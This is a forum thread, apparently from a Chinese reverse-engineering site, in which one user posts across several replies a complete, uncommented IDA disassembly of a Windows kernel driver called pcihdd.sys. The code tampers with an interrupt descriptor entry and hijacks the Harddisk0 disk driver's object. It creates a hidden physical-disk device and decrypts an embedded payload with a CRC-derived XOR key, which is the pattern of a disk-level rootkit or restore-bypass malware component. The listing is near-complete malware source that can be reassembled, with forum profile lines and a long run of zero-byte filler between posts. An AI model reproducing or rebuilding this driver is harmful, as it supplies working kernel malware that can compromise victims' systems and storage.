; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º    This file is generated by The Interactive Disassembler (IDA)       º
; º    Copyright (c) 2006 by DataRescue sa/nv, <ida@datarescue.com>       º
; º Licensed to: Paul Ashton - Blue Lane Technologies (1-user Advanced 03/2006) º%s
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
;
; Input MD5 : 289345E696BBDE6C2C6ABA2D5E506D23

; File Name : D:\1\pcihdd.sys
; Format    : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 000002B0)
; Virtual size                : 0000058A ( 1418.)
; Section size in file       : 00000590 ( 1424.)
; Offset to raw data for section: 000002B0
; Flags 68000020: Text Not pageable Executable Readable
; Alignment    : default

.686p
.mmx
.model flat

; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 4002B0h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing

sub_4002B0 proc near
jmp    short $+2
mov    ecx, 100h
mov    edx, 0CCECC9B1h

loc_4002BC:
lea    eax, [ecx-1]
push ecx
mov    ecx, 8

loc_4002C5:
shr    eax, 1
jnb    short loc_4002CB
xor    eax, edx

loc_4002CB:
dec    ecx
jnz    short loc_4002C5
pop    ecx
mov    dword_4008D2[ecx*4], eax
dec    ecx
jnz    short loc_4002BC
retn
sub_4002B0 endp

sub_4002DA proc near
jmp    short $+2
mov    eax, 0FFFFFFFFh
or    ebx, ebx
jz    short loc_4002FA

loc_4002E5:
mov    dl, [ebx]
xor    dl, al
movzx edx, dl
shr    eax, 8
xor    eax, dword_4008D6[edx*4]
inc    ebx
dec    ecx
jnz    short loc_4002E5

loc_4002FA:
not    eax
retn
sub_4002DA endp

; Attributes: bp-based frame

sub_4002FD proc near

var_4= dword ptr -4
arg_0= dword ptr  8
arg_4= dword ptr  0Ch
arg_8= dword ptr  10h
arg_C= dword ptr  14h

push ebp
mov    ebp, esp
add    esp, 0FFFFFBFCh
pusha
xor    eax, eax
mov    [ebp+var_4], eax
mov    esi, [ebp+arg_8]
mov    cx, [esi+0Ch]
add    cx, [esi+0Eh]
movzx ecx, cx
add    esi, 10h
cmp    ecx, 0
jbe    short loc_40033E
mov    ebx, [esi+4]
and    ebx, 7FFFFFFFh
add    ebx, [ebp+arg_4]
mov    eax, [ebx]
add    eax, [ebp+arg_0]
mov    ecx, [ebp+arg_C]
mov    [ecx], eax
mov    ecx, [ebx+4]
mov    [ebp+var_4], ecx

loc_40033E:
popa
mov    eax, [ebp+var_4]
leave
retn 10h
sub_4002FD endp

; Attributes: bp-based frame

sub_400346 proc near

var_4= dword ptr -4
arg_0= dword ptr  8
arg_4= dword ptr  0Ch
arg_8= dword ptr  10h
arg_C= dword ptr  14h
arg_10= dword ptr  18h

push ebp
mov    ebp, esp
add    esp, 0FFFFFBFCh
pusha
xor    eax, eax
mov    [ebp+var_4], eax
mov    esi, [ebp+arg_8]
mov    cx, [esi+0Ch]
add    cx, [esi+0Eh]
movzx ecx, cx
add    esi, 10h
jmp    short loc_4003AA

loc_400368:
push ecx
mov    ebx, [esi+4]
test ebx, 80000000h
jz    short loc_4003A5
and    ebx, 7FFFFFFFh
add    ebx, [ebp+arg_4]
mov    edx, [esi]
test edx, 80000000h
jnz    short loc_4003A5
cmp    edx, [ebp+arg_C]
jnz    short loc_4003A5
push [ebp+arg_10]
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4002FD
mov    [ebp+var_4], eax
or    eax, eax
jz    short loc_4003A5
pop    ecx
jmp    short loc_4003AF

loc_4003A5:
add    esi, 8
pop    ecx
dec    ecx

loc_4003AA:
cmp    ecx, 0
ja    short loc_400368

loc_4003AF:
popa
mov    eax, [ebp+var_4]
leave
retn 14h
sub_400346 endp

2007-9-2 17:18

0

wymjeef

雪币： 324

活跃值： (160)

能力值：

( LV2，RANK：10 )

在线值：

发帖

21

回帖

59

粉丝

0

关注

私信

wymjeef: 3 楼

; Attributes: bp-based frame

sub_4003B7 proc near

var_8= dword ptr -8
var_4= dword ptr -4
arg_0= dword ptr  8
arg_4= dword ptr  0Ch
arg_8= dword ptr  10h
arg_C= dword ptr  14h

push ebp
mov    ebp, esp
add    esp, 0FFFFFBF8h
pusha
xor    eax, eax
mov    [ebp+var_4], eax
mov    edi, [ebp+arg_0]
mov    edi, [edi+3Ch]
add    edi, [ebp+arg_0]
mov    ecx, [edi+8Ch]
or    ecx, ecx
jz    short loc_400449
mov    eax, [edi+88h]
add    eax, [ebp+arg_0]
mov    [ebp+var_8], eax
push eax          ; VirtualAddress
call MmIsAddressValid
or    eax, eax
jnz    short loc_4003F1
jmp    short loc_400449

loc_4003F1:
mov    esi, [ebp+var_8]
mov    cx, [esi+0Ch]
add    cx, [esi+0Eh]
movzx ecx, cx
add    esi, 10h
jmp    short loc_400444

loc_400404:
push ecx
mov    ebx, [esi+4]
test ebx, 80000000h
jz    short loc_40043F
and    ebx, 7FFFFFFFh
add    ebx, [ebp+var_8]
mov    eax, [esi]
test eax, 80000000h
jnz    short loc_40043F
cmp    eax, [ebp+arg_8]
jnz    short loc_40043F
push [ebp+arg_C]
push [ebp+arg_4]
push ebx
push [ebp+var_8]
push [ebp+arg_0]
call sub_400346
mov    [ebp+var_4], eax
pop    ecx
jmp    short loc_400449

loc_40043F:
add    esi, 8
pop    ecx
dec    ecx

loc_400444:
cmp    ecx, 0
ja    short loc_400404

loc_400449:
popa
mov    eax, [ebp+var_4]
leave
retn 10h
sub_4003B7 endp

; Attributes: bp-based frame

sub_400451 proc near

var_4= dword ptr -4

push ebp
mov    ebp, esp
add    esp, 0FFFFFFFCh
pusha
mov    [ebp+var_4], 0

loc_40045F:
lea    ebx, loc_40045F
and    ebx, 0FFFFFC00h

loc_40046B:          ; VirtualAddress
push ebx
call MmIsAddressValid
or    eax, eax
jz    short loc_4004B1
cmp    ebx, 80000000h
jbe    short loc_4004B1
cmp    word ptr [ebx], 5A4Dh
jnz    short loc_4004A9
mov    edi, ebx
add    edi, [ebx+3Ch]
push edi          ; VirtualAddress
call MmIsAddressValid
or    eax, eax
jz    short loc_40049F
cmp    word ptr [edi], 4550h
jnz    short loc_40049F
mov    [ebp+var_4], ebx
jmp    short loc_4004B1

loc_40049F:
sub    ebx, 400h
jmp    short loc_40046B
jmp    short loc_4004B1

loc_4004A9:
sub    ebx, 400h
jmp    short loc_40046B

loc_4004B1:
popa
mov    eax, [ebp+var_4]
leave
retn
sub_400451 endp

; Attributes: bp-based frame

sub_4004B7 proc near

var_4= dword ptr -4

push ebp
mov    ebp, esp
add    esp, 0FFFFFFFCh
pusha
sidt qword_400CE2
mov    esi, dword ptr qword_400CE2+2
mov    eax, 9
shl    eax, 3
add    esi, eax
movzx eax, word ptr [esi+6]
shl    eax, 10h
mov    ax, [esi]
and    eax, 0FF000000h
mov    [ebp+var_4], eax
sub    eax, eax
jz    short loc_400515
mov    esi, dword ptr qword_400CE2+2
mov    eax, 0Eh
shl    eax, 3
add    esi, eax
movzx eax, word ptr [esi+6]
shl    eax, 10h
mov    ax, [esi]
and    eax, 0FF000000h
cmp    eax, [ebp+var_4]
jz    short loc_400515
mov    word ptr [esi+6], 0

loc_400515:
popa
leave
retn
sub_4004B7 endp

; Attributes: bp-based frame

sub_400518 proc near

UnicodeString= UNICODE_STRING ptr -24h
SourceString= STRING ptr -1Ch
FileObject= dword ptr -8
DeviceObject= dword ptr -4
arg_4= dword ptr  0Ch

push ebp
mov    ebp, esp
add    esp, 0FFFFFFDCh
push edi
push esi
push ebx
mov    edi, [ebp+arg_4]
mov    dword ptr [edi+1Ch], 0
mov    dword ptr [edi+18h], 0
mov    esi, [edi+60h]
movzx eax, byte ptr [esi]
or    eax, eax
jnz    short loc_4005B0
jmp    short $+2
push offset SourceString ; "\\Device\\Harddisk0\\DR0"
lea    eax, [ebp+SourceString]
push eax          ; DestinationString
call RtlInitAnsiString
push 1             ; AllocateDestinationString
lea    eax, [ebp+SourceString]
push eax          ; SourceString
lea    eax, [ebp+UnicodeString]
push eax          ; DestinationString
call RtlAnsiStringToUnicodeString
xor    eax, eax
mov    [ebp+FileObject], eax
mov    [ebp+DeviceObject], eax
lea    eax, [ebp+DeviceObject]
push eax          ; DeviceObject
lea    eax, [ebp+FileObject]
push eax          ; FileObject
push 80h          ; DesiredAccess
lea    eax, [ebp+UnicodeString]
push eax          ; ObjectName
call IoGetDeviceObjectPointer
mov    eax, [ebp+FileObject]
jmp    short $+2
mov    eax, [eax+4]
mov    dword_4008CE, eax
cmp    dword ptr [eax+10h], 0
jz    short loc_40059A
jmp    short $+2
mov    ecx, [eax+10h]
xchg ecx, dword_4008D2
mov    [eax+10h], ecx

loc_40059A:
push [ebp+FileObject]
call ObDereferenceObject
lea    eax, [ebp+UnicodeString]
push eax          ; UnicodeString
call RtlFreeUnicodeString
jmp    loc_400637

loc_4005B0:
cmp    eax, 2
jnz    short loc_4005CD
mov    eax, dword_4008CE
or    eax, eax
jz    short loc_400637
mov    ecx, dword_4008D2
or    ecx, ecx
jz    short loc_4005CB
mov    [eax+10h], ecx

loc_4005CB:
jmp    short loc_400637

loc_4005CD:
cmp    eax, 0Eh
jnz    short loc_400637
mov    eax, [esi+0Ch]
cmp    eax, 0F0003C04h
jnz    short loc_400637
call sub_4002B0
mov    ebx, [edi+0Ch]
mov    ecx, [esi+8]
call sub_4002DA
mov    dword_400CD6, eax
push dword_400CD6
push (offset qword_400CE2+6) ; Format
call DbgPrint
add    esp, 8
mov    eax, [esi+4]
cmp    eax, NumberOfBytes
jbe    short loc_400637
mov    edi, [edi+3Ch]
mov    esi, P
mov    ecx, NumberOfBytes
shr    ecx, 2

loc_400621:
lodsd
xor    eax, dword_400CD6
stosd
dec    ecx
jnz    short loc_400621
mov    ecx, NumberOfBytes
and    ecx, 3
rep movsb

loc_400637:
push 0
push [ebp+arg_4]
call IoCompleteRequest
mov    eax, 0
pop    ebx
pop    esi
pop    edi
leave
retn 8
sub_400518 endp

2007-9-2 17:18

0

wymjeef

雪币： 324

活跃值： (160)

能力值：

( LV2，RANK：10 )

在线值：

发帖

21

回帖

59

粉丝

0

关注

私信

wymjeef: 4 楼

; Attributes: bp-based frame

sub_40064D proc near

SourceString= STRING ptr -10h
UnicodeString= UNICODE_STRING ptr -8
arg_0= dword ptr  8

push ebp
mov    ebp, esp
add    esp, 0FFFFFFF0h
push edi
push esi
push ebx
pusha
cmp    P, 0
jz    short loc_40066B
push P             ; P
call ExFreePool

loc_40066B:
cmp    [ebp+arg_0], 0
jz    short loc_4006B7
push offset s_DosdevicesPhy ; "\\DosDevices\\PhysicalHardDisk0"
lea    eax, [ebp+SourceString]
push eax          ; DestinationString
call RtlInitAnsiString
push 1             ; AllocateDestinationString
lea    eax, [ebp+SourceString]
push eax          ; SourceString
lea    eax, [ebp+UnicodeString]
push eax          ; DestinationString
call RtlAnsiStringToUnicodeString
lea    eax, [ebp+UnicodeString]
push eax          ; SymbolicLinkName
call IoDeleteSymbolicLink
lea    eax, [ebp+UnicodeString]
push eax          ; UnicodeString
call RtlFreeUnicodeString
mov    edi, [ebp+arg_0]
mov    esi, [edi+4]
jmp    short loc_4006B3

loc_4006A8:
mov    edi, [esi+0Ch]
push esi          ; DeviceObject
call IoDeleteDevice
mov    esi, edi

loc_4006B3:
or    esi, esi
jnz    short loc_4006A8

loc_4006B7:
popa
pop    ebx
pop    esi
pop    edi
leave
retn 4
sub_40064D endp

; Attributes: bp-based frame

; int __stdcall start(PDRIVER_OBJECT DriverObject,int)
public start
start proc near

var_20= dword ptr -20h
SourceString= STRING ptr -1Ch
DeviceObject= dword ptr -14h
SymbolicLinkName= UNICODE_STRING ptr -10h
UnicodeString= UNICODE_STRING ptr -8
DriverObject= dword ptr  8

push ebp
mov    ebp, esp
add    esp, 0FFFFFFE0h
push edi
push esi
push ebx
pusha
nop
nop
call sub_4004B7
call sub_400451
or    eax, eax
jz    short loc_40071F
mov    ecx, eax
lea    eax, [ebp+var_20]
push eax
push 3E8h
push 3E8h
push ecx
call sub_4003B7
or    eax, eax
jz    short loc_40071F
mov    NumberOfBytes, eax
push NumberOfBytes ; NumberOfBytes
push 0             ; PoolType
call ExAllocatePool
mov    P, eax
jmp    short $+2
mov    edi, P
mov    esi, [ebp+var_20]
mov    ecx, NumberOfBytes
rep movsb
jmp    short loc_40072A

loc_40071F:
popa
xor    eax, eax
dec    eax
pop    ebx
pop    esi
pop    edi
leave
retn 8

loc_40072A:
jmp    short $+2
mov    eax, [ebp+DriverObject]
mov    dword ptr [eax+34h], offset sub_40064D
lea    edi, [eax+38h]
lea    eax, sub_400518
mov    [edi], eax
mov    [edi+8], eax
mov    [edi+38h], eax
push offset s_DevicePhysica ; "\\Device\\PhysicalHardDisk0"
lea    eax, [ebp+SourceString]
push eax          ; DestinationString
call RtlInitAnsiString
push 1             ; AllocateDestinationString
lea    eax, [ebp+SourceString]
push eax          ; SourceString
lea    eax, [ebp+UnicodeString]
push eax          ; DestinationString
call RtlAnsiStringToUnicodeString
push offset s_DosdevicesPhy ; "\\DosDevices\\PhysicalHardDisk0"
lea    eax, [ebp+SourceString]
push eax          ; DestinationString
call RtlInitAnsiString
push 1             ; AllocateDestinationString
lea    eax, [ebp+SourceString]
push eax          ; SourceString
lea    eax, [ebp+SymbolicLinkName]
push eax          ; DestinationString
call RtlAnsiStringToUnicodeString
lea    eax, [ebp+DeviceObject]
push eax          ; DeviceObject
push 0             ; Exclusive
push 0             ; DeviceCharacteristics
push 15h          ; DeviceType
lea    eax, [ebp+UnicodeString]
push eax          ; DeviceName
push 0             ; DeviceExtensionSize
push [ebp+DriverObject] ; DriverObject
call IoCreateDevice
or    eax, eax
jz    short loc_40079F
jmp    short loc_4007C9

loc_40079F:
lea    eax, [ebp+UnicodeString]
push eax          ; DeviceName
lea    eax, [ebp+SymbolicLinkName]
push eax          ; SymbolicLinkName
call IoCreateSymbolicLink
or    eax, eax
jz    short loc_4007C9
mov    edi, [ebp+DriverObject]
mov    esi, [edi+4]
jmp    short loc_4007C3

loc_4007B8:
mov    edi, [esi+0Ch]
push esi          ; DeviceObject
call IoDeleteDevice
mov    esi, edi

loc_4007C3:
or    esi, esi
jnz    short loc_4007B8
jmp    short $+2

loc_4007C9:
lea    eax, [ebp+UnicodeString]
push eax          ; UnicodeString
call RtlFreeUnicodeString
lea    eax, [ebp+SymbolicLinkName]
push eax          ; UnicodeString
call RtlFreeUnicodeString
popa
xor    eax, eax
pop    ebx
pop    esi
pop    edi
leave
retn 8
start endp

align 2
; [00000006 BYTES: COLLAPSED FUNCTION RtlInitAnsiString. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION RtlFreeUnicodeString. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION RtlAnsiStringToUnicodeString. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION ObDereferenceObject. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION MmIsAddressValid. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION IoGetDeviceObjectPointer. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION IoDeleteSymbolicLink. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION IoDeleteDevice. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION IoCreateSymbolicLink. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION IoCreateDevice. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION IoCompleteRequest. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION ExFreePool. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION ExAllocatePool. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION DbgPrint. PRESS KEYPAD "+" TO EXPAND]
align 10h
_text ends

; Section 2. (virtual address 00000840)
; Virtual size                : 0000003C (    60.)
; Section size in file       : 00000040 (    64.)
; Offset to raw data for section: 00000840
; Flags 48000040: Data Not pageable Readable
; Alignment    : default
;
; Imports from ntoskrnl.exe
;

; Segment type: Externs
; _idata
; void __stdcall RtlInitAnsiString(PANSI_STRING DestinationString,PCSZ SourceString)
extrn __imp_RtlInitAnsiString:dword
; void __stdcall RtlFreeUnicodeString(PUNICODE_STRING UnicodeString)
extrn __imp_RtlFreeUnicodeString:dword
; NTSTATUS __stdcall RtlAnsiStringToUnicodeString(PUNICODE_STRING DestinationString,PANSI_STRING SourceString,BOOLEAN AllocateDestinationString)
extrn __imp_RtlAnsiStringToUnicodeString:dword
extrn __imp_ObDereferenceObject:dword
; BOOLEAN __stdcall MmIsAddressValid(PVOID VirtualAddress)
extrn __imp_MmIsAddressValid:dword
; NTSTATUS __stdcall IoGetDeviceObjectPointer(PUNICODE_STRING ObjectName,ACCESS_MASK DesiredAccess,PFILE_OBJECT *FileObject,PDEVICE_OBJECT *DeviceObject)
extrn __imp_IoGetDeviceObjectPointer:dword
; NTSTATUS __stdcall IoDeleteSymbolicLink(PUNICODE_STRING SymbolicLinkName)
extrn __imp_IoDeleteSymbolicLink:dword
; void __stdcall IoDeleteDevice(PDEVICE_OBJECT DeviceObject)
extrn __imp_IoDeleteDevice:dword
; NTSTATUS __stdcall IoCreateSymbolicLink(PUNICODE_STRING SymbolicLinkName,PUNICODE_STRING DeviceName)
extrn __imp_IoCreateSymbolicLink:dword
; NTSTATUS __stdcall IoCreateDevice(PDRIVER_OBJECT DriverObject,ULONG DeviceExtensionSize,PUNICODE_STRING DeviceName,ULONG DeviceType,ULONG DeviceCharacteristics,BOOLEAN Exclusive,PDEVICE_OBJECT *DeviceObject)
extrn __imp_IoCreateDevice:dword
extrn __imp_IoCompleteRequest:dword
; void __stdcall ExFreePool(PVOID P)
extrn __imp_ExFreePool:dword
; PVOID __stdcall ExAllocatePool(POOL_TYPE PoolType,SIZE_T NumberOfBytes)
extrn __imp_ExAllocatePool:dword
; ULONG DbgPrint(PCH Format,...)
extrn __imp_DbgPrint:dword

; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 40087Ch
align 10h
_rdata ends

; Section 3. (virtual address 00000880)
; Virtual size                : 0000046D ( 1133.)
; Section size in file       : 00000470 ( 1136.)
; Offset to raw data for section: 00000880
; Flags C8000040: Data Not pageable Readable Writable
; Alignment    : default

2007-9-2 17:19

0

wymjeef

雪币： 324

活跃值： (160)

能力值：

( LV2，RANK：10 )

在线值：

发帖

21

回帖

59

粉丝

0

关注

私信

wymjeef: 5 楼

; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 400880h
; char s_DevicePhysica[]
s_DevicePhysica db '\Device\PhysicalHardDisk0',0
; char s_DosdevicesPhy[]
s_DosdevicesPhy db '\DosDevices\PhysicalHardDisk0',0
; char SourceString[]
SourceString db '\Device\Harddisk0\DR0',0
dword_4008CE dd 0
dword_4008D2 dd 0
dword_4008D6 dd 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dword_400CD6 dd 0
; PVOID P
P dd 0
; SIZE_T NumberOfBytes
NumberOfBytes dd 0
qword_400CE2 dq 3025000000000000h
db  38h ; 8
db  58h ; X
db 0
db 0
db 0
db 0
_data ends

; Section 4. (virtual address 00000CF0)
; Virtual size                : 00000198 ( 408.)
; Section size in file       : 000001A0 ( 416.)
; Offset to raw data for section: 00000CF0
; Flags E2000020: Text Discardable Executable Readable Writable
; Alignment    : default

2007-9-2 17:20

0

wymjeef

雪币： 324

活跃值： (160)

能力值：

( LV2，RANK：10 )

在线值：

发帖

21

回帖

59

粉丝

0

关注

私信

wymjeef: 6 楼

; Segment type: Pure code
; Segment permissions: Read/Write/Execute
INIT segment para public 'CODE' use32
assume cs:INIT
;org 400CF0h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dd 0D18h, 2 dup(0)
dd 0E7Ah, 840h, 5 dup(0)
dd 0D54h, 0D68h, 0D80h, 0DA0h, 0DB6h, 0DCAh
dd 0DE6h, 0DFEh, 0E10h, 0E28h, 0E3Ah, 0E4Eh
dd 0E5Ch, 0E6Eh, 0
db  61h ; a
db 3, 52h, 74h
s_Linitansistri db 'lInitAnsiString',0
db  50h ; P
db 3, 52h, 74h
s_Lfreeunicodes db 'lFreeUnicodeString',0
align 10h
db 0FAh ; ú
db 2, 52h, 74h
s_Lansistringto db 'lAnsiStringToUnicodeString',0
align 10h
db 0ABh ; «
db 2, 4Fh, 62h
s_Dereferenceob db 'DereferenceObject',0
dw 245h
s_Mmisaddressva db 'MmIsAddressValid',0
align 2
dw 13Dh
s_Iogetdeviceob db 'IoGetDeviceObjectPointer',0
align 2
dw 127h
s_Iodeletesymbo db 'IoDeleteSymbolicLink',0
align 2
dw 125h
s_Iodeletedevic db 'IoDeleteDevice',0
align 10h
db  21h ; !
db 1, 49h, 6Fh
